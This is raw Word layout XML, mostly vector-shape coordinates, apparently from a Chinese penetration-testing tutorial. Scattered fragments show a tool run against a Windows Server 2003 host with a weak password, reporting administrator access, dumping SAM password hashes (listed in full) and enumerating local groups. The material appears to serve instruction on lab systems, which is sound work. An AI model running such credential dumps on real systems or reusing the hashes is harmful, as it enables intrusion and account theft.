,12705,1960,12705,1960,12705,1960,12705,1960,12705,1960,12705,1960,12705,1960,12705,1960,12705,1960,12705,1960,12705,1959,12705,1959,12705,1959,12705,1959,12705,1959,12705,1959,12705,1959,12705,1959,12705,1959,12705,1958,12705,1958,12705,1958,12705,1958,12705,1958,12705,1957,12705,1957,12705,1957,12705,1957,12705,1956,12705,1956,12705,1956,12705,1955,12705,1955,12705,1955,12705,1954,12705,1954,12705,1953,12705,1953,12705,1953,12705,1952,12705,1952,12705,1951,12705,1951,12705,1950,12705,1949,12705,1949,12705,1948,12705,1947,12705,1947,12705,1946,12705,1945,12705,1945,12705,1944,12705,1943,12705,1942,12705,1941,12705,1940,12705,1940,12705,1939,12705,1938,12705,1937,12705,1936,12705,1934,12705,1933,12705,1932,12705,1931,12705,1930,12705,1929,12705,1927,12705,1926,12705,1925,12705,1924,12705,1922,12705,1921,12705,1919,12705,1918,12705,1916,12705,1915,12705,1913,12705,1911,12705,1910,12705,1908,12705,1906,12705,1905,12705,1903,12705,1901,12705,1899,12705,1897,12705,1895,12705,1893,12705,1891,12705,1889,12705,1887,12705,1884,12705,1882,12705,1880,12705,1878,12705,1875,12705,1873,12705,1870,12705,1868,12705,1865,12705,1863,12705,1860,12705,1857,12705,1854,12705,1852,12705,1849,12705,1846,12705,1843,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12705,1840,12704,1840,12704,1840,12704,1840,12704,1840,12704,1840,12703,1840,12703,1840,12703,1840,12702,1840,12702,1840,12702,1840,12701,1840,12701,1840,12700,1840,12700,1840,12699,1840,12699,1840,12698,1840,12698,1840,12697,1840,12696,1840,12696,1840,12695,1840,12694,1840,12693,1840,12693,1840,12692,1840,12691,1840,12690,1840,12689,1840,12688,1840,12686,1840,12685,1840,12684,1840,12683,1840,12682,1840,12680,1840,12679,1840,12677,1840,12676,1840,12674,1840,12673,1840,12671,1840,12669,1840,12668,1840,12666,1840,12664,1840,12662,1840,12660,1840,12658,1840,12656,1840,12653,1840,12651,1840,12649,1840,12647,1840,12644,1840,12642,1840,12639,1840,12636,1840,12634,1840,12631,1840,12628,1840,12625,1840,12622,1840,12619,1840,12616,1840,12612,1840,12609,1840,12606,1840,12602,1840,12599,1840,12595,1840,12591,1840,12588,1840,12584,1840,12580,1840,12576,1840,12571,1840,12567,1840,12563,1840,12559,1840,12554,1840,12549,1840,12545,1840,12540,1840,12535,1840,12530,1840,12525,1840,12520,1840,12515,1840,12509,1840,12504,1840,12498,1840,12493,1840,12487,1840,12481,1840,12475,1840,12469,1840,12463,1840,12457,1840,12450e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:289.500pt;margin-top:639.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5790,12790" coordsize="130,270">
        <v:shape style="position:absolute;left:5790;top:12790;width:130;height:270" coordorigin="5790,12790" coordsize="130,270" path="m5817,12810l5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5817,12810,5818,12810,5818,12810,5818,12810,5818,12810,5818,12810,5818,12810,5818,12810,5818,12810,5819,12810,5819,12810,5819,12810,5819,12810,5819,12810,5820,12810,5820,12810,5820,12810,5821,12810,5821,12810,5821,12810,5821,12810,5822,12810,5822,12810,5823,12810,5823,12810,5823,12810,5824,12810,5824,12810,5825,12810,5825,12810,5826,12810,5826,12810,5827,12810,5828,12810,5828,12810,5829,12810,5829,12810,5830,12810,5831,12810,5832,12810,5832,12810,5833,12810,5834,12810,5835,12810,5836,12810,5836,12810,5837,12810,5838,12810,5839,12810,5840,12810,5841,12810,5842,12810,5844,12810,5845,12810,5846,12810,5847,12810,5848,12810,5849,12810,5851,12810,5852,12810,5853,12810,5855,12810,5856,12810,5858,12810,5859,12810,5861,12810,5862,12810,5864,12810,5865,12810,5867,12810,5869,12810,5871,12810,5872,12810,5874,12810,5876,12810,5878,12810,5880,12810,5882,12810,5884,12810,5886,12810,5888,12810,5890,12810,5893,12810,5895,12810,5897,12810,5899,12810,5902,12810,5904,12810,5907,12810,5909,12810,5912,12810,5914,12810,5917,12810,5920,12810,5922,12810,5925,12810,5928,12810,5931,12810,5934,12810,5937,12810,5937,12810,5937,12810,5937,12810,5937,12810,5937,12810,5937,12810,5937,12810,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12811,5937,12812,5937,12812,5937,12812,5937,12812,5937,12813,5937,12813,5937,12813,5937,12813,5937,12814,5937,12814,5937,12815,5937,12815,5937,12815,5937,12816,5937,12816,5937,12817,5937,12818,5937,12818,5937,12819,5937,12819,5937,12820,5937,12821,5937,12822,5937,12822,5937,12823,5937,12824,5937,12825,5937,12826,5937,12827,5937,12828,5937,12829,5937,12831,5937,12832,5937,12833,5937,12834,5937,12836,5937,12837,5937,12838,5937,12840,5937,12842,5937,12843,5937,12845,5937,12847,5937,12848,5937,12850,5937,12852,5937,12854,5937,12856,5937,12858,5937,12860,5937,12862,5937,12865,5937,12867,5937,12869,5937,12872,5937,12874,5937,12877,5937,12880,5937,12882,5937,12885,5937,12888,5937,12891,5937,12894,5937,12897,5937,12900,5937,12903,5937,12907,5937,12910,5937,12914,5937,12917,5937,12921,5937,12925,5937,12928,5937,12932,5937,12936,5937,12940,5937,12944,5937,12949,5937,12953,5937,12957,5937,12962,5937,12966,5937,12971,5937,12976,5937,12981,5937,12986,5937,12991,5937,12996,5937,13001,5937,13007,5937,13012,5937,13018,5937,13023,5937,13029,5937,13035,5937,13041,5937,13047,5937,13053,5937,13059,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5937,13066,5936,13066,5936,13066,5936,13066,5936,13066,5936,13066,5936,13066,5936,13066,5936,13066,5935,13066,5935,13066,5935,13066,5935,13066,5935,13066,5934,13066,5934,13066,5934,13066,5934,13066,5933,13066,5933,13066,5933,13066,5932,13066,5932,13066,5932,13066,5931,13066,5931,13066,5930,13066,5930,13066,5930,13066,5929,13066,5929,13066,5928,13066,5928,13066,5927,13066,5926,13066,5926,13066,5925,13066,5924,13066,5924,13066,5923,13066,5922,13066,5922,13066,5921,13066,5920,13066,5919,13066,5918,13066,5917,13066,5917,13066,5916,13066,5915,13066,5914,13066,5913,13066,5911,13066,5910,13066,5909,13066,5908,13066,5907,13066,5906,13066,5904,13066,5903,13066,5902,13066,5901,13066,5899,13066,5898,13066,5896,13066,5895,13066,5893,13066,5892,13066,5890,13066,5888,13066,5887,13066,5885,13066,5883,13066,5882,13066,5880,13066,5878,13066,5876,13066,5874,13066,5872,13066,5870,13066,5868,13066,5866,13066,5864,13066,5861,13066,5859,13066,5857,13066,5855,13066,5852,13066,5850,13066,5847,13066,5845,13066,5842,13066,5840,13066,5837,13066,5834,13066,5831,13066,5829,13066,5826,13066,5823,13066,5820,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13066,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13065,5817,13064,5817,13064,5817,13064,5817,13064,5817,13063,5817,13063,5817,13063,5817,13063,5817,13062,5817,13062,5817,13061,5817,13061,5817,13061,5817,13060,5817,13060,5817,13059,5817,13059,5817,13058,5817,13057,5817,13057,5817,13056,5817,13055,5817,13054,5817,13054,5817,13053,5817,13052,5817,13051,5817,13050,5817,13049,5817,13048,5817,13047,5817,13045,5817,13044,5817,13043,5817,13042,5817,13040,5817,13039,5817,13038,5817,13036,5817,13034,5817,13033,5817,13031,5817,13030,5817,13028,5817,13026,5817,13024,5817,13022,5817,13020,5817,13018,5817,13016,5817,13014,5817,13011,5817,13009,5817,13007,5817,13004,5817,13002,5817,12999,5817,12996,5817,12994,5817,12991,5817,12988,5817,12985,5817,12982,5817,12979,5817,12976,5817,12973,5817,12969,5817,12966,5817,12962,5817,12959,5817,12955,5817,12951,5817,12948,5817,12944,5817,12940,5817,12936,5817,12932,5817,12927,5817,12923,5817,12919,5817,12914,5817,12910,5817,12905,5817,12900,5817,12895,5817,12890,5817,12885,5817,12880,5817,12875,5817,12870,5817,12864,5817,12859,5817,12853,5817,12847,5817,12841,5817,12835,5817,12829,5817,12823,5817,12817,5817,1281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1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'123456'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‐‐sam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3790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Pack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name:WIN03X64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domain:WIN03X64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SMBv1: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WIN03X64\administrator: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Pwn3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d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="2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Dumping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SAM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hashes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Administrator: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500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efce164ab921caaad3b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435b51404ee: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32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ed87bdb5fdc5e9cb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a88547376818d4:::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Guest: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501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:aad3b435b51404eeaad3b435b5140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4ee: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67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f33d2095bda39fb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f6b63fbadf2313a:::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SUPPORT_388945a0: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1001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:aad3b435b51404eea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ad3b435b51404ee:f4d13c67c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7608094c9b0e39147f07520:::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IUSR_WIN03X64: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1003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:dbec20afefb6cc332311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fb9822ba61ce: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68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c22a11c400d91fa4f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66ff36b3c15dc:::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IWAM_WIN03X64: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1004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:ff783381e4e022de176c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59bf598409c7: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e456daac229ddcecc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f5f367aa69a487:::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ASPNET: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1008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:cc26551b70faffc095feb73db16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b65ff:fec6e9e4a0831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9a1f62cd30447247f88:::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6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SAM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hashes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database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枚举组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'123456'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‐‐loca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l‐gr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oups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3790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Pack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name:WIN03X64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domain:WIN03X64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SMBv1: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WIN03X64\administrator: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Pwn3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d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="2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Enumerated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groups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HelpServicesGroup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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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IIS_WPG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TelnetClients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Administrators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1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Backup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Operators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Distributed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Users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14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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Guests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224.838pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,4496">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:4496" coordorigin="10402,0" coordsize="0,4496" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,7,10402,9,10402,10,10402,13,10402,15,10402,18,10402,21,10402,24,10402,28,10402,32,10402,36,10402,41,10402,46,10402,52,10402,58,10402,65,10402,72,10402,79,10402,87,10402,95,10402,104,10402,114,10402,124,10402,135,10402,146,10402,158,10402,170,10402,183,10402,197,10402,212,10402,227,10402,243,10402,259,10402,277,10402,295,10402,313,10402,333,10402,353,10402,375,10402,397,10402,420,10402,443,10402,468,10402,494,10402,520,10402,548,10402,576,10402,605,10402,635,10402,667,10402,699,10402,732,10402,767,10402,802,10402,839,10402,876,10402,915,10402,955,10402,995,10402,1038,10402,1081,10402,1125,10402,1171,10402,1218,10402,1266,10402,1315,10402,1366,10402,1418,10402,1471,10402,1525,10402,1581,10402,1638,10402,1697,10402,1757,10402,1818,10402,1881,10402,1945,10402,2010,10402,2077,10402,2146,10402,2216,10402,2287,10402,2360,10402,2435,10402,2511,10402,2589,10402,2668,10402,2749,10402,2831,10402,2915,10402,3001,10402,3089,10402,3178,10402,3268,10402,3361,10402,3455,10402,3551,10402,3649,10402,3748,10402,3850,10402,3953,10402,4058,10402,4165,10402,4273,10402,4384,10402,4496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18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:370" coordorigin="1490,1630" coordsize="8990,37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5,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1650,10484,1651,10484,1651,10484,1652,10484,1653,10484,1653,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1659,10484,1660,10484,1661,10484,1662,10484,1663,10484,1664,10484,1666,10484,1667,10484,1668,10484,1670,10484,1672,10484,1673,10484,1675,10484,1677,10484,1678,10484,1680,10484,1682,10484,1684,10484,1687,10484,1689,10484,1691,10484,1693,10484,1696,10484,1698,10484,1701,10484,1704,10484,1706,10484,1709,10484,1712,10484,1715,10484,1718,10484,1721,10484,1725,10484,1728,10484,1731,10484,1735,10484,1739,10484,1742,10484,1746,10484,1750,10484,1754,10484,1758,10484,1763,10484,1767,10484,1772,10484,1776,10484,1781,10484,1786,10484,1790,10484,1796,10484,1801,10484,1806,10484,1811,10484,1817,10484,1822,10484,1828,10484,1834,10484,1840,10484,1846,10484,1852,10484,1859,10484,1865,10484,1872,10484,1878,10484,1885,10484,1892,10484,1899,10484,1907,10484,1914,10484,1922,10484,1929,10484,1937,10484,1945,10484,1953,10484,1961,10484,1970,10484,1978,10484,1987,10484,1996,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10483,2005,10482,2005,10482,2005,10480,2005,10479,2005,10477,2005,10475,2005,10473,2005,10470,2005,10466,2005,10462,2005,10458,2005,10453,2005,10448,2005,10442,2005,10435,2005,10428,2005,10419,2005,10411,2005,10401,2005,10391,2005,10379,2005,10367,2005,10354,2005,10340,2005,10326,2005,10310,2005,10293,2005,10275,2005,10256,2005,10236,2005,10215,2005,10192,2005,10168,2005,10143,2005,10117,2005,10090,2005,10061,2005,10031,2005,9999,2005,9966,2005,9931,2005,9895,2005,9858,2005,9819,2005,9778,2005,9735,2005,9691,2005,9646,2005,9598,2005,9549,2005,9498,2005,9445,2005,9391,2005,9334,2005,9275,2005,9215,2005,9153,2005,9088,2005,9022,2005,8953,2005,8883,2005,8810,2005,8735,2005,8658,2005,8578,2005,8497,2005,8413,2005,8326,2005,8238,2005,8146,2005,8053,2005,7957,2005,7859,2005,7758,2005,7654,2005,7548,2005,7439,2005,7328,2005,7214,2005,7097,2005,6977,2005,6855,2005,6730,2005,6602,2005,6471,2005,6337,2005,6201,2005,6061,2005,5918,2005,5773,2005,5624,2005,5472,2005,5317,2005,5159,2005,4997,2005,4833,2005,4665,2005,4494,2005,4319,2005,4141,2005,3960,2005,3776,2005,3587,2005,3396,2005,3201,2005,3002,2005,2800,2005,2594,2005,2385,2005,2172,2005,1955,2005,1734,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2004,1510,2004,1510,2004,1510,2004,1510,2004,1510,2004,1510,2003,1510,2003,1510,2003,1510,2002,1510,2002,1510,2002,1510,2001,1510,2001,1510,2000,1510,2000,1510,1999,1510,1999,1510,1998,1510,1997,1510,1997,1510,1996,1510,1995,1510,1994,1510,1993,1510,1992,1510,1991,1510,1990,1510,1989,1510,1988,1510,1987,1510,1986,1510,1984,1510,1983,1510,1981,1510,1980,1510,1978,1510,1977,1510,1975,1510,1973,1510,1971,1510,1969,1510,1967,1510,1965,1510,1963,1510,1961,1510,1959,1510,1956,1510,1954,1510,1952,1510,1949,1510,1946,1510,1944,1510,1941,1510,1938,1510,1935,1510,1932,1510,1929,1510,1925,1510,1922,1510,1918,1510,1915,1510,1911,1510,1907,1510,1904,1510,1900,1510,1896,1510,1891,1510,1887,1510,1883,1510,1878,1510,1874,1510,1869,1510,1864,1510,1859,1510,1854,1510,1849,1510,1844,1510,1839,1510,1833,1510,1827,1510,1822,1510,1816,1510,1810,1510,1804,1510,1798,1510,1791,1510,1785,1510,1778,1510,1771,1510,1765,1510,1758,1510,1750,1510,1743,1510,1736,1510,1728,1510,1721,1510,1713,1510,1705,1510,1697,1510,1688,1510,1680,1510,1671,1510,1663,1510,1654,1510,1645e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:1630;width:30;height:370" coordorigin="1490,1630" coordsize="30,370" path="m1517,1645l1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1646,1517,1646,1517,1646,1517,1646,1517,1646,1517,1647,1517,1647,1517,1647,1517,1647,1517,1648,1517,1648,1517,1649,1517,1649,1517,1650,1517,1650,1517,1651,1517,1651,1517,1652,1517,1653,1517,1653,1517,1654,1517,1655,1517,1656,1517,1657,1517,1658,1517,1659,1517,1660,1517,1661,1517,1662,1517,1663,1517,1664,1517,1666,1517,1667,1517,1668,1517,1670,1517,1672,1517,1673,1517,1675,1517,1677,1517,1678,1517,1680,1517,1682,1517,1684,1517,1687,1517,1689,1517,1691,1517,1693,1517,1696,1517,1698,1517,1701,1517,1704,1517,1706,1517,1709,1517,1712,1517,1715,1517,1718,1517,1721,1517,1725,1517,1728,1517,1731,1517,1735,1517,1739,1517,1742,1517,1746,1517,1750,1517,1754,1517,1758,1517,1763,1517,1767,1517,1772,1517,1776,1517,1781,1517,1786,1517,1790,1517,1796,1517,1801,1517,1806,1517,1811,1517,1817,1517,1822,1517,1828,1517,1834,1517,1840,1517,1846,1517,1852,1517,1859,1517,1865,1517,1872,1517,1878,1517,1885,1517,1892,1517,1899,1517,1907,1517,1914,1517,1922,1517,1929,1517,1937,1517,1945,1517,1953,1517,1961,1517,1970,1517,1978,1517,1987,1517,1996,1517,2005e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:99.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:1990;width:8990;height:650" coordorigin="1490,1990" coordsize="8990,650" path="m1510,2005l1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1511,2005,1512,2005,1512,2005,1514,2005,1515,2005,1517,2005,1519,2005,1521,2005,1524,2005,1528,2005,1532,2005,1536,2005,1541,2005,1546,2005,1552,2005,1559,2005,1566,2005,1575,2005,1583,2005,1593,2005,1603,2005,1615,2005,1627,2005,1640,2005,1654,2005,1668,2005,1684,2005,1701,2005,1719,2005,1738,2005,1758,2005,1780,2005,1802,2005,1826,2005,1851,2005,1877,2005,1904,2005,1933,2005,1963,2005,1995,2005,2028,2005,2063,2005,2099,2005,2136,2005,2175,2005,2216,2005,2259,2005,2303,2005,2348,2005,2396,2005,2445,2005,2496,2005,2549,2005,2604,2005,2660,2005,2719,2005,2779,2005,2841,2005,2906,2005,2972,2005,3041,2005,3112,2005,3184,2005,3259,2005,3336,2005,3416,2005,3498,2005,3582,2005,3668,2005,3757,2005,3848,2005,3941,2005,4037,2005,4136,2005,4236,2005,4340,2005,4446,2005,4555,2005,4666,2005,4780,2005,4897,2005,5017,2005,5139,2005,5264,2005,5392,2005,5523,2005,5657,2005,5793,2005,5933,2005,6076,2005,6222,2005,6370,2005,6522,2005,6677,2005,6835,2005,6997,2005,7161,2005,7329,2005,7500,2005,7675,2005,7853,2005,8034,2005,8219,2005,8407,2005,8598,2005,8793,2005,8992,2005,9194,2005,9400,2005,9609,2005,9823,2005,10039,2005,10260,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2006,10484,2006,10484,2006,10484,2006,10484,2006,10484,2007,10484,2007,10484,2007,10484,2008,10484,2008,10484,2009,10484,2009,10484,2010,10484,2010,10484,2011,10484,2012,10484,2013,10484,2013,10484,2014,10484,2015,10484,2016,10484,2018,10484,2019,10484,2020,10484,2021,10484,2023,10484,2024,10484,2026,10484,2028,10484,2030,10484,2031,10484,2033,10484,2035,10484,2038,10484,2040,10484,2042,10484,2045,10484,2047,10484,2050,10484,2053,10484,2056,10484,2059,10484,2062,10484,2065,10484,2069,10484,2072,10484,2076,10484,2080,10484,2084,10484,2088,10484,2092,10484,2096,10484,2101,10484,2105,10484,2110,10484,2115,10484,2120,10484,2125,10484,2131,10484,2136,10484,2142,10484,2148,10484,2154,10484,2160,10484,2167,10484,2173,10484,2180,10484,2187,10484,2194,10484,2201,10484,2209,10484,2216,10484,2224,10484,2232,10484,2240,10484,2249,10484,2257,10484,2266,10484,2275,10484,2284,10484,2294,10484,2303,10484,2313,10484,2323,10484,2333,10484,2344,10484,2355,10484,2365,10484,2377,10484,2388,10484,2400,10484,2411,10484,2423,10484,2436,10484,2448,10484,2461,10484,2474,10484,2487,10484,2501,10484,2515,10484,2529,10484,2543,10484,2558,10484,2572,10484,2587,10484,2603,10484,2618,10484,2634,10484,2650,10484,2650,10484,2650,10484,2650,10484,2650,10484,2650,10484,2650,10483,2650,10482,2650,10482,2650,10480,2650,10479,2650,10477,2650,10475,2650,10473,2650,10470,2650,10466,2650,10462,2650,10458,2650,10453,2650,10448,2650,10442,2650,10435,2650,10428,2650,10419,2650,10411,2650,10401,2650,10391,2650,10379,2650,10367,2650,10354,2650,10340,2650,10326,2650,10310,2650,10293,2650,10275,2650,10256,2650,10236,2650,10215,2650,10192,2650,10168,2650,10143,2650,10117,2650,10090,2650,10061,2650,10031,2650,9999,2650,9966,2650,9931,2650,9895,2650,9858,2650,9819,2650,9778,2650,9735,2650,9691,2650,9646,2650,9598,2650,9549,2650,9498,2650,9445,2650,9391,2650,9334,2650,9275,2650,9215,2650,9153,2650,9088,2650,9022,2650,8953,2650,8883,2650,8810,2650,8735,2650,8658,2650,8578,2650,8497,2650,8413,2650,8326,2650,8238,2650,8146,2650,8053,2650,7957,2650,7859,2650,7758,2650,7654,2650,7548,2650,7439,2650,7328,2650,7214,2650,7097,2650,6977,2650,6855,2650,6730,2650,6602,2650,6471,2650,6337,2650,6201,2650,6061,2650,5918,2650,5773,2650,5624,2650,5472,2650,5317,2650,5159,2650,4997,2650,4833,2650,4665,2650,4494,2650,4319,2650,4141,2650,3960,2650,3776,2650,3587,2650,3396,2650,3201,2650,3002,2650,2800,2650,2594,2650,2385,2650,2172,2650,1955,2650,1734,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2649,1510,2649,1510,2649,1510,2649,1510,2648,1510,2648,1510,2648,1510,2647,1510,2647,1510,2646,1510,2646,1510,2645,1510,2644,1510,2644,1510,2643,1510,2642,1510,2641,1510,2640,1510,2639,1510,2638,1510,2637,1510,2635,1510,2634,1510,2632,1510,2631,1510,2629,1510,2628,1510,2626,1510,2624,1510,2622,1510,2620,1510,2618,1510,2615,1510,2613,1510,2611,1510,2608,1510,2605,1510,2602,1510,2600,1510,2596,1510,2593,1510,2590,1510,2587,1510,2583,1510,2579,1510,2576,1510,2572,1510,2568,1510,2563,1510,2559,1510,2555,1510,2550,1510,2545,1510,2540,1510,2535,1510,2530,1510,2525,1510,2519,1510,2513,1510,2507,1510,2501,1510,2495,1510,2489,1510,2482,1510,2476,1510,2469,1510,2462,1510,2454,1510,2447,1510,2439,1510,2431,1510,2423,1510,2415,1510,2407,1510,2398,1510,2389,1510,2380,1510,2371,1510,2362,1510,2352,1510,2342,1510,2332,1510,2322,1510,2312,1510,2301,1510,2290,1510,2279,1510,2267,1510,2256,1510,2244,1510,2232,1510,2220,1510,2207,1510,2194,1510,2181,1510,2168,1510,2154,1510,2141,1510,2127,1510,2112,1510,2098,1510,2083,1510,2068,1510,2053,1510,2037,1510,2021,1510,2005e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:99.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:1990;width:30;height:650" coordorigin="1490,1990" coordsize="30,650" path="m1517,2005l1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2005,1517,2006,1517,2006,1517,2006,1517,2006,1517,2006,1517,2007,1517,2007,1517,2007,1517,2008,1517,2008,1517,2009,1517,2009,1517,2010,1517,2010,1517,2011,1517,2012,1517,2013,1517,2013,1517,2014,1517,2015,1517,2016,1517,2018,1517,2019,1517,2020,1517,2021,1517,2023,1517,2024,1517,2026,1517,2028,1517,2030,1517,2031,1517,2033,1517,2035,1517,2038,1517,2040,1517,2042,1517,2045,1517,2047,1517,2050,1517,2053,1517,2056,1517,2059,1517,2062,1517,2065,1517,2069,1517,2072,1517,2076,1517,2080,1517,2084,1517,2088,1517,2092,1517,2096,1517,2101,1517,2105,1517,2110,1517,2115,1517,2120,1517,2125,1517,2131,1517,2136,1517,2142,1517,2148,1517,2154,1517,2160,1517,2167,1517,2173,1517,2180,1517,2187,1517,2194,1517,2201,1517,2209,1517,2216,1517,2224,1517,2232,1517,2240,1517,2249,1517,2257,1517,2266,1517,2275,1517,2284,1517,2294,1517,2303,1517,2313,1517,2323,1517,2333,1517,2344,1517,2355,1517,2365,1517,2377,1517,2388,1517,2400,1517,2411,1517,2423,1517,2436,1517,2448,1517,2461,1517,2474,1517,2487,1517,2501,1517,2515,1517,2529,1517,2543,1517,2558,1517,2572,1517,2587,1517,2603,1517,2618,1517,2634,1517,2650e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:131.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2630" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2630;width:8990;height:370" coordorigin="1490,2630" coordsize="8990,370" path="m1510,2650l1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1510,2650,1511,2650,1512,2650,1512,2650,1514,2650,1515,2650,1517,2650,1519,2650,1521,2650,1524,2650,1528,2650,1532,2650,1536,2650,1541,2650,1546,2650,1552,2650,1559,2650,1566,2650,1575,2650,1583,2650,1593,2650,1603,2650,1615,2650,1627,2650,1640,2650,1654,2650,1668,2650,1684,2650,1701,2650,1719,2650,1738,2650,1758,2650,1780,2650,1802,2650,1826,2650,1851,2650,1877,2650,1904,2650,1933,2650,1963,2650,1995,2650,2028,2650,2063,2650,2099,2650,2136,2650,2175,2650,2216,2650,2259,2650,2303,2650,2348,2650,2396,2650,2445,2650,2496,2650,2549,2650,2604,2650,2660,2650,2719,2650,2779,2650,2841,2650,2906,2650,2972,2650,3041,2650,3112,2650,3184,2650,3259,2650,3336,2650,3416,2650,3498,2650,3582,2650,3668,2650,3757,2650,3848,2650,3941,2650,4037,2650,4136,2650,4236,2650,4340,2650,4446,2650,4555,2650,4666,2650,4780,2650,4897,2650,5017,2650,5139,2650,5264,2650,5392,2650,5523,2650,5657,2650,5793,2650,5933,2650,6076,2650,6222,2650,6370,2650,6522,2650,6677,2650,6835,2650,6997,2650,7161,2650,7329,2650,7500,2650,7675,2650,7853,2650,8034,2650,8219,2650,8407,2650,8598,2650,8793,2650,8992,2650,9194,2650,9400,2650,9609,2650,9823,2650,10039,2650,10260,2650,10484,2650,10484,2650,10484,2650,10484,2650,10484,2650,10484,2650,10484,2650,10484,2650,10484,2650,10484,2650,10484,2650,10484,2651,10484,2651,10484,2651,10484,2651,10484,2651,10484,2651,10484,2651,10484,2651,10484,2652,10484,2652,10484,2652,10484,2652,10484,2653,10484,2653,10484,2653,10484,2654,10484,2654,10484,2655,10484,2655,10484,2656,10484,2656,10484,2657,10484,2657,10484,2658,10484,2659,10484,2659,10484,2660,10484,2661,10484,2662,10484,2663,10484,2664,10484,2665,10484,2666,10484,2667,10484,2669,10484,2670,10484,2671,10484,2673,10484,2674,10484,2675,10484,2677,10484,2679,10484,2680,10484,2682,10484,2684,10484,2686,10484,2688,10484,2690,10484,2692,10484,2694,10484,2697,10484,2699,10484,2701,10484,2704,10484,2706,10484,2709,10484,2712,10484,2715,10484,2718,10484,2721,10484,2724,10484,2727,10484,2730,10484,2733,10484,2737,10484,2741,10484,2744,10484,2748,10484,2752,10484,2756,10484,2760,10484,2764,10484,2768,10484,2773,10484,2777,10484,2782,10484,2786,10484,2791,10484,2796,10484,2801,10484,2806,10484,2811